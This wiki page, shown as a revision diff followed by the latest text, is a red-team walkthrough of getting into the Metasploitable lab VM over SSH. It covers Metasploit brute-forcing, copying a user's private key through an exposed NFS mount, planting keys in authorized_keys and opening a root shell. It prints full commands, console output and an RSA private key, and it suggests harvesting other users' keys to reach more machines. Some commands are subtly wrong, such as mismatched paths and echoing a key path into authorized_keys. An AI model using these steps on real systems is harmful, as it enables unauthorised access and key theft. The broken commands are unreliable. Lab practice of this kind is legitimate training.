Metasploitable/SSH/Exploits: Difference between revisions

From charlesreid1
 
(21 intermediate revisions by the same user not shown)
Line 14: Line 14:
This server isn't using the 1.0 protocol, which is hopelessly broken and easy to defeat. This means getting past SSH will be (at least) mildly challenging.
This server isn't using the 1.0 protocol, which is hopelessly broken and easy to defeat. This means getting past SSH will be (at least) mildly challenging.


==Links with Background Info==
==Metasploit SSH Exploits==


Here is some good background info two SSH attacks: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/
Two SSH attacks using metasploit:
* ssh_login
* ssh_login_pubkey
 
===Metasploit ssh_login===


The first attack is ssh_login, which allows you to use metasploit to brute-force guess SSH login credentials.
The first attack is ssh_login, which allows you to use metasploit to brute-force guess SSH login credentials.
* Module name is <code>auxiliary/scanner/ssh/ssh_login</code>
* Module name is <code>auxiliary/scanner/ssh/ssh_login</code>


The second attack requires a private key. If you do gain access to the private SSH keys on a machine, you can attempt to authenticate with a large number of hosts and services using that private key.
Link: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/
 
===Metasploit ssh_login_pubkey===
 
The second attack requires a private key. If you do gain access to the private SSH keys on a victim machine, you can attempt to authenticate with a large number of hosts and services using that private key.
* Module name is <code>auxiliary/scanner/ssh/ssh_login_pubkey</code>
* Module name is <code>auxiliary/scanner/ssh/ssh_login_pubkey</code>
Link: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/


=Brute Force ssh_login=
=Brute Force ssh_login=
Line 36: Line 46:
<pre>
<pre>
msf > use auxiliary/scanner/ssh/ssh_login
msf > use auxiliary/scanner/ssh/ssh_login
msf auxiliary(ssh_login) > show options
Module options:
  Name              Current Setting  Required  Description
  ----              ---------------  --------  -----------
  BLANK_PASSWORDS  true            yes      Try blank passwords for all users
  BRUTEFORCE_SPEED  5                yes      How fast to bruteforce, from 0 to 5
  PASSWORD                          no        A specific password to authenticate with
  PASS_FILE                          no        File containing passwords, one per line
  RHOSTS                            yes      The target address range or CIDR identifier
  RPORT            22              yes      The target port
  STOP_ON_SUCCESS  false            yes      Stop guessing when a credential works for a host
  THREADS          1                yes      The number of concurrent threads
  USERNAME                          no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE          true            yes      Whether to print output for all attempts
</pre>
</pre>


Line 82: Line 74:
</pre>
</pre>


==Get a Shell==
==Houston, We Have A Shell==


At this point, we can create a session with the machine that we compromised. Here we execute some commands as user msfadmin, to see what groups we're in:
At this point, we can create a session with the machine that we compromised. Logged in as user msfadmin:


<pre>
<pre>
Line 94: Line 86:
uname -a
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '
Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '
exit
 
[*] Command shell session 1 closed.
msf auxiliary(ssh_login) >
</pre>
</pre>


=Private Key ssh_login_pubkey=
=Private Key ssh_login_pubkey=


If you manage to get your hands on a private key, the <code>auxiliary/scanner/ssh/ssh_login_pubkey</code> module is for you!
If you manage to get your hands on the victim's private key, the <code>auxiliary/scanner/ssh/ssh_login_pubkey</code> module is for you!


This will allow you to get root.
This module uses the private key to do two things:
* Get access to the victim machine
* Get access to any machines that trust the victim's private key (must be listed in the SSH files of the victim machine)


==Obtaining Private Key==
==Obtaining Private Key==


To carry out this attack and obtain root on the remote machine, without a password.
To carry out this attack, you will need to have access to the file system, and/or be able to mount the remote file system (which, on Metasploitable, happens to be possible!): see [[Metasploitable/NFS]]
 
Once you've got access to the file system, you'll grab a copy of the remote machine's private keys, and use them together with Metasploit to obtain access to the machine.


You'll need to mount the remote file system (which is so exposed that you can mount the entire drive as a writable partition!): see [[Metasploitable/NFS]]
(Note that you could also plant your keys on the target, by adding your public SSH keys onto the target machine's list of trusted machines, but this technique would restrict you to a particular machine, wile the Metasploit method is portable and less intrusive.)


To run through the steps again quickly:
To snatch the target's private key:


<pre>
<pre>
# service rpcbind start
# service rpcbind start
# mkdir /tmp/r00t
# mkdir /tmp/target
# mount -t nfs 10.0.0.27:/ /tmp/r00t
# mount -t nfs 10.0.0.27:/ /temp/target
# cp /tmp/r00t/root/.ssh/id_rsa /tmp/r00tprivatekey
# cp /tmp/target/home/msfadmin/.ssh/id_rsa /tmp/r00tprivatekey
# umount /tmp/r00t
# umount /tmp/target
</pre>
</pre>


Now we have a copy of the root account's private SSH key, and can use this in our attack. You can obtain this private key in whatever manner you wish - this is just one technique.
Now you have a copy of the <code>msfadmin</code> account's private SSH key.
 
Metasploit We'll use Metasploit to turn this into access to the remote machine.  
 
This key is also useful for impersonating the target when connecting to OTHER remote machines.


==Setting Up the Attack==
===Planting Private Keys===
 
An alternative method to gain access, although it is not useful for gaining access to any machines other than the victim machine, is to GENERATE a public/private SSH key pair from the attacker machine, and copy the PRIVATE key over to the remote machine. (Using the public key and the above-mentioned technique would be easier, but it's worth mentioning at least.)
 
To plant your private keys on the remote machine, you'll need write access to the target user's home directory. You'll generate a public SSH key from the attacker machine, the machine you want to have access WITH, and add it to the other machine's <code>~/.ssh/authorized_keys</code>.


Here's how it works. We'll use the <code>auxiliary/scanner/ssh/ssh_login_pubkey</code> module to carry out this attack.
This presumes the <code>.ssh</code> directory exists. If it doesn't exist, you can make it, and tamper with the filesystem.


<pre>
<pre>
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
# service rpcbind start
msf auxiliary(ssh_login_pubkey) > show options
# mkdir /tmp/target
# mount -t nfs 10.0.0.27:/ /temp/target
# cd /tmp/target/home/msfadmin/ && mkdir .ssh/
# echo ~/.ssh/id_rsa >> /tmp/target/home/msfadmin/.ssh/authorized_keys
# umount /tmp/target
</pre>


Module options:
==Setting Up the Attack==


  Name              Current Setting  Required  Description
Here's info on the <code>auxiliary/scanner/ssh/ssh_login_pubkey</code> module in Metasploit, which will carry out the attack:
  ----              ---------------  --------  -----------
  BRUTEFORCE_SPEED  5                yes      How fast to bruteforce, from 0 to 5
  KEY_FILE                          no        Filename of one or several cleartext private keys.
  RHOSTS                            yes      The target address range or CIDR identifier
  RPORT            22              yes      The target port
  STOP_ON_SUCCESS  false            yes      Stop guessing when a credential works for a host
  THREADS          1                yes      The number of concurrent threads
  USERNAME                          no        A specific username to authenticate as
  USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line
  USER_FILE                          no        File containing usernames, one per line
  VERBOSE          true            yes      Whether to print output for all attempts


msf auxiliary(ssh_login_pubkey) >
<pre>
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
</pre>
</pre>


Set some options, such as the private key file, the username to try and remotely log in to, and the host of the machine to attempt to log in to using the private key:
Set some options, such as the private key file, the username to log in with, and the remote host:


<pre>
<pre>
Line 163: Line 160:
==Running the Attack==
==Running the Attack==


Now it's go time:
Execute the attack, to use the remote machine's private key to gain access to the remote machine:


<pre>
<pre>
Line 169: Line 166:


[*] 10.0.0.27:22 SSH - Testing Cleartext Keys
[*] 10.0.0.27:22 SSH - Testing Cleartext Keys
[*] 10.0.0.27:22 SSH - Testing 1 keys from r00tsmfadminprivatekey
[*] 10.0.0.27:22 SSH - Testing 1 keys from /root/r00tmsfkey
[+] 10.0.0.27:22 SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
[+] 10.0.0.27:22 SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEoQIBAAKCAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqld
MIIEoQIBAAKCAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqld
Line 198: Line 195:
-----END RSA PRIVATE KEY-----
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.0.5:56900 -> 10.0.0.27:22) at 2016-03-26 19:11:10 -0700
[*] Command shell session 1 opened (10.0.0.5:33428 -> 10.0.0.27:22) at 2016-03-26 19:42:50 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[*] Auxiliary module execution completed
msf auxiliary(ssh_login_pubkey) >
msf auxiliary(ssh_login_pubkey) >
</pre>
</pre>
Success - we've got a session.
==Getting a Shell==
Now we can use the <code>sessions</code> command to utilize the information we just found and set up an interactive session.
<pre>
msf auxiliary(ssh_login_pubkey) > sessions -i 1
[*] Starting interaction with 1...
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
whoami
root
pwd
/root
</pre>
We could create more mischief, by copying everyone else's private SSH keys and SSH connection histories, potentially giving us passwordless access to additional machines.
We could also get busy with post-exploit activities.
See https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/


=Flags=
=Flags=

Latest revision as of 02:45, 26 October 2017

https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

SSH Service Info

First, a reminder of the information nmap returned about the SSH service after a port scan: 

22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)

This server isn't using the 1.0 protocol, which is hopelessly broken and easy to defeat. This means getting past SSH will be (at least) mildly challenging.

Metasploit SSH Exploits

Two SSH attacks using metasploit:

  • ssh_login
  • ssh_login_pubkey

Metasploit ssh_login

The first attack is ssh_login, which allows you to use metasploit to brute-force guess SSH login credentials.

  • Module name is auxiliary/scanner/ssh/ssh_login

Link: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

Metasploit ssh_login_pubkey

The second attack requires a private key. If you do gain access to the private SSH keys on a victim machine, you can attempt to authenticate with a large number of hosts and services using that private key.

  • Module name is auxiliary/scanner/ssh/ssh_login_pubkey

Link: https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

Brute Force ssh_login

We already covered how to brute force the login with Hydra, Metasploitable/SSH/Brute Force

Did you know you can also brute force an SSH login with Metasploitable? Use the auxiliary/scanner/ssh/ssh_login module.

Setting Up the Attack

We will use the module auxiliary/scanner/ssh/ssh_login: 

msf > use auxiliary/scanner/ssh/ssh_login

Set this to run on the Metasploitable virtual box target: 

msf auxiliary(ssh_login) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
USERPASS_FILE => /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
msf auxiliary(ssh_login) > set VERBOSE false
VERBOSE => false

Running the Attack

Now run the attack: 

msf auxiliary(ssh_login) > run

[*] 10.0.0.27:22 - SSH - Starting buteforce
[*] Command shell session 1 opened (?? -> ??) at 2016-03-26 17:25:18 -0600
[+] 10.0.0.27:22 - SSH - Success: 'msfadmin':'msfadmin' 'uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login) >

Houston, We Have A Shell

At this point, we can create a session with the machine that we compromised. Logged in as user msfadmin: 

msf auxiliary(ssh_login) > sessions -i 1
[*] Starting interaction with 1...

id
uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Wed Apr 10 12:02:00 UTC 2014 i686 GNU/Linux '

Private Key ssh_login_pubkey

If you manage to get your hands on the victim's private key, the auxiliary/scanner/ssh/ssh_login_pubkey module is for you!

This module uses the private key to do two things:

  • Get access to the victim machine
  • Get access to any machines that trust the victim's private key (must be listed in the SSH files of the victim machine)

Obtaining Private Key

To carry out this attack, you will need to have access to the file system, and/or be able to mount the remote file system (which, on Metasploitable, happens to be possible!): see Metasploitable/NFS

Once you've got access to the file system, you'll grab a copy of the remote machine's private keys, and use them together with Metasploit to obtain access to the machine.

(Note that you could also plant your keys on the target, by adding your public SSH keys onto the target machine's list of trusted machines, but this technique would restrict you to a particular machine, wile the Metasploit method is portable and less intrusive.)

To snatch the target's private key: 

# service rpcbind start
# mkdir /tmp/target
# mount -t nfs 10.0.0.27:/ /temp/target
# cp /tmp/target/home/msfadmin/.ssh/id_rsa /tmp/r00tprivatekey
# umount /tmp/target

Now you have a copy of the msfadmin account's private SSH key.

Metasploit We'll use Metasploit to turn this into access to the remote machine.

This key is also useful for impersonating the target when connecting to OTHER remote machines.

Planting Private Keys

An alternative method to gain access, although it is not useful for gaining access to any machines other than the victim machine, is to GENERATE a public/private SSH key pair from the attacker machine, and copy the PRIVATE key over to the remote machine. (Using the public key and the above-mentioned technique would be easier, but it's worth mentioning at least.)

To plant your private keys on the remote machine, you'll need write access to the target user's home directory. You'll generate a public SSH key from the attacker machine, the machine you want to have access WITH, and add it to the other machine's ~/.ssh/authorized_keys.

This presumes the .ssh directory exists. If it doesn't exist, you can make it, and tamper with the filesystem. 

# service rpcbind start
# mkdir /tmp/target
# mount -t nfs 10.0.0.27:/ /temp/target
# cd /tmp/target/home/msfadmin/ && mkdir .ssh/
# echo ~/.ssh/id_rsa >> /tmp/target/home/msfadmin/.ssh/authorized_keys
# umount /tmp/target

Setting Up the Attack

Here's info on the auxiliary/scanner/ssh/ssh_login_pubkey module in Metasploit, which will carry out the attack: 

msf > use auxiliary/scanner/ssh/ssh_login_pubkey

Set some options, such as the private key file, the username to log in with, and the remote host: 

msf auxiliary(ssh_login_pubkey) > set KEY_FILE /tmp/r00tprivatekey
KEY_FILE => /tmp/id_rsa
msf auxiliary(ssh_login_pubkey) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login_pubkey) > set RHOSTS 10.0.0.27
RHOSTS => 10.0.0.27
msf auxiliary(ssh_login_pubkey) >

Running the Attack

Execute the attack, to use the remote machine's private key to gain access to the remote machine: 

msf auxiliary(ssh_login_pubkey) > run

[*] 10.0.0.27:22 SSH - Testing Cleartext Keys
[*] 10.0.0.27:22 SSH - Testing 1 keys from /root/r00tmsfkey
[+] 10.0.0.27:22 SSH - Success: 'root:-----BEGIN RSA PRIVATE KEY-----
MIIEoQIBAAKCAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqld
JkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qO
ffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5
JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9I
yhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7b
wkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3wIBIwKCAQBaUjR5bUXnHGA5fd8N
UqrUx0zeBQsKlv1bK5DVm1GSzLj4TU/S83B1NF5/1ihzofI7OAQvlCdUY2tHpGGa
zQ6ImSpUQ5i9+GgBUOaklRL/i9cHdFv7PSonW+SvF1UKY5EidEJRb/O6oFgB5q8G
JKrwu+HPNhvD+dliBnCn0JU+Op/1Af7XxAP814Rz0nZZwx+9KBWVdAAbBIQ5zpRO
eBBlLSGDsnsQN/lG7w8sHDqsSt2BCK8c9ct31n14TK6HgOx3EuSbisEmKKwhWV6/
ui/qWrrzurXA4Q73wO1cPtPg4sx2JBh3EMRm9tfyCCtB1gBi0N/2L7j9xuZGGY6h
JETbAoGBANI8HzRjytWBMvXh6TnMOa5S7GjoLjdA3HXhekyd9DHywrA1pby5nWP7
VNP+ORL/sSNl+jugkOVQYWGG1HZYHk+OQVo3qLiecBtp3GLsYGzANA/EDHmYMUSm
4v3WnhgYMXMDxZemTcGEyLwurPHumgy5nygSEuNDKUFfWO3mymIXAoGBAMqZi3YL
zDpL9Ydj6JhO51aoQVT91LpWMCgK5sREhAliWTWjlwrkroqyaWAUQYkLeyA8yUPZ
PufBmrO0FkNa+4825vg48dyq6CVobHHR/GcjAzXiengi6i/tzHbA0PEai0aUmvwY
OasZYEQI47geBvVD3v7D/gPDQNoXG/PWIPt5AoGBAMw6Z3S4tmkBKjCvkhrjpb9J
PW05UXeA1ilesVG+Ayk096PcV9vngvNpLdVAGi+2jtHuCQa5PEx5+DLav8Nriyi2
E5l35bqoiilCQ83PriCAMpL49iz6Pn00Z3o+My1ZVJudQ5qhjVznY+oBdM3DNpAE
xn6yeL+DEiI/XbPngsWvAoGAbfuU2a6iEQSp28iFlIKa10VlS2U493CdzJg0IWcF
2TVjoMaFMcyZQ/pzt9B7WQY7hodl8aHRsQKzERieXxQiKSxuwUN7+3K4iVXxuiGJ
BMndK+FYbRpEnaz591K6kYNwLaEg70BZ0ek0QjC2Ih7t1ZnfdFvEaHFPF05foaAg
iIMCgYAsNZut02SC6hwwaWh3Uxr07s6jB8HyrET0v1vOyOe3xSJ9YPt7c1Y20OQO
Fb3Yq4pdHm7AosAgtfC1eQi/xbXP73kloEmg39NZAfT3wg817FXiS2QGHXJ4/dmK
94Z9XOEDocClV7hr9H//hoO8fV/PHXh0oFQvw1d+29nf+sgWDg==
-----END RSA PRIVATE KEY-----
' 'uid=0(root) gid=0(root) groups=0(root) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux '
[*] Command shell session 1 opened (10.0.0.5:33428 -> 10.0.0.27:22) at 2016-03-26 19:42:50 -0700
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(ssh_login_pubkey) >

Success - we've got a session.

Getting a Shell

Now we can use the sessions command to utilize the information we just found and set up an interactive session. 

msf auxiliary(ssh_login_pubkey) > sessions -i 1
[*] Starting interaction with 1...

id
uid=0(root) gid=0(root) groups=0(root)

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

whoami
root

pwd
/root

We could create more mischief, by copying everyone else's private SSH keys and SSH connection histories, potentially giving us passwordless access to additional machines.

We could also get busy with post-exploit activities.

See https://www.offensive-security.com/metasploit-unleashed/scanner-ssh-auxiliary-modules/

Flags


Defcon.png
Metasploit
any and all resources related to metasploit on this wiki


MSF - on the metasploit framework generally

Category:Metasploit - pages labeled with the "Metasploit" category label

MSF/Wordlists - wordlists that come bundled with Metasploit

MSFVenom - msfvenom is used to craft payloads

Meterpreter - the shell you'll have when you use MSF to craft a remote shell payload.


Category:Security  · Category:Metasploit  · Category:Kali


Flags  · Template:MetasploitFlag  · e





Defcon.png
Metasploitable: The Red Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the RED TEAM's tools and routes of attack.


Metasploitable Databases:

Exploiting MySQL with Metasploit: Metasploitable/MySQL

Exploiting PostgreSQL with Metasploit: Metasploitable/Postgres


Metasploitable Networking:

Exploiting VSFTP Backdoor: Metasploitable/VSFTP

SSH Penetration by Brute Force: Metasploitable/SSH/Brute Force

SSH Penetration with Keys: Metasploitable/SSH/Keys

SSH Penetration with Metasploit: Metasploitable/SSH/Exploits

Brute-Forcing /etc/shadow File: Metasploitable/John Shadow File

Exploiting NFS: Metasploitable/NFS

Exploiting DNS Bind Server: Metasploitable/DNS Bind


Metasploitable Services:

distcc: Metasploitable/distcc


Metasploitable Apache:

Exploiting Apache (with Metasploit): Metasploitable/Apache

Exploiting Apache (with Python): Metasploitable/Apache/Python

Tor's Hammer DoS Attack: Metasploitable/TorsHammer *

Apache DAV: Metasploitable/Apache/DAV *

Apache Tomcat and Coyote: Metasploitable/Apache/Tomcat and Coyote


Metasploitable Memory:

General approach to memory-based attacks: Metasploitable/Memory

Investigating memory data: Metasploitable/Volatile Data Investigation

Dumping Memory from Metasploit: Metasploitable/Dumping Memory


Metasploitable Fuzzing:

(Have not done much work on fuzzing Metasploitable...)

Fuzzing  · American Fuzzy Lop


Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali


Flags  · Template:MetasploitableRedTeamFlag  · e




Defcon.png
Metasploitablue: The Blue Team
Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit. This set of articles discusses the BLUE TEAM's methods for defending Metasploitable: defending against and responding to intrusions.

Hence the name, Metasploita-blue.

Overview: Metasploitable/Defenses

Metasploitable/Defenses/Stopping  · Metasploitable/Defenses/Detecting


Metasploitable On-Machine Defenses:

Linux Volatile Data System Investigation: Metasploitable/Volatile Data Investigation

Linux Artifact Investigation: Metasploitable/Artifact Investigation

Linux Iptables Essentials: Metasploitable/Iptables

Firewall Assurance and Testing: Metasploitable/Firewall

Password Assessment: Metasploitable/Password Assessment

Standard Unix Ports: Unix/Ports


Metasploitable Networking Defenses:

Netcat and Cryptcat (Blue Team): Metasploitable/Netcat and Metasploitable/Cryptcat

Nmap (Blue Team): Metasploitable/Nmap

Network Traffic Analysis: Metasploitable/Network Traffic Analysis

Suspicious Traffic Patterns: Metasploitable/Suspicious Traffic Patterns

Snort IDS: Metasploitable/Snort


Category:Security  · Category:Metasploit  · Category:Metasploitable  · Category:Kali


Flags  · Template:MetasploitableBlueTeamFlag  · e




SSH9999Success.png
ssh
secure shell, the most useful tool in unix


SSH  · Category:SSH


Tunnels:

Building SSH tunnels: SSH Tunnels

Tunnel SSH through HTTPS: Stunnel

Tunnel SSH through DNS: Iodine


Raspberry Pi and SSH:

RaspberryPi/Headless  · RaspberryPi/Reverse SSH

RaspberryPi/SSH Stunnel  · RaspberryPi/Reverse SSH Stunnel

Category:SSH  · Category:Networking


Linux and SSH:

Linux/SSH

Metasploitable/SSH


Category:SSH  · Category:Kali  · Category:Networking

Flags  · Template:SSHFlag  · e




Retrieved from "https://charlesreid1.com/w/index.php?title=Metasploitable/SSH/Exploits&oldid=22008"